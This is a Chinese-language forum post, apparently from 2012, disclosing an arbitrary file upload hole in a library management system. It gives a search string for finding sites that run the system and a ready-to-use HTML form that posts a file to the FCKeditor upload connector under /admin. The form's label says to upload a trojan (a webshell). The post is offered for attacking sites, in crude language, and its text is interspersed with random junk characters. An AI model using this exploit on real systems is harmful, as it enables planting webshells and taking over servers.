主题:图书馆系统任意文件上传漏洞1 ]- R; R* M! y6 E- q4 ]1 A
作者:冰锋刺客
, \: L! k/ `* ^" H0 [ 厂商:点击书(dianjishu.com)" r6 H. W9 ~" F, V N! X5 z
日期:2012-6-214 ]' [' `% ~1 P. g& {
2 g! n3 m5 E' A- T, cI 概述
- U+ H) [" L& w& E 点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell/ C. O+ u7 p* |& @
II 简介( g, O8 G3 f- m7 y
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
u# o+ |# w, @0 z4 | 补充一个漏洞
- R4 E, Z9 o% o0 g. q <form id="frmUpload" enctype="multipart/form-data", e+ c- L' t7 A
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br> [/ A; b o" a6 Q: m7 b' O3 @2 k
<input id="btnUpload" type="submit" value="操翻他">% H$ r2 m1 Y) O3 f; M% u9 Y, J
</form>8 h, }. T4 x7 b# c
你们懂的
8 V6 U" P* Q" ?% x 那傻逼提供还需要改包.
# t8 V8 [! r8 V5 ]/ r7 r 自己看了下源代码发现fckeditor8 B4 @( [! M \- \' x5 N
直接秒杀2 p+ Q: i$ R3 O- T
|
发表于 2012-9-10 21:20:59
收藏
支持
反对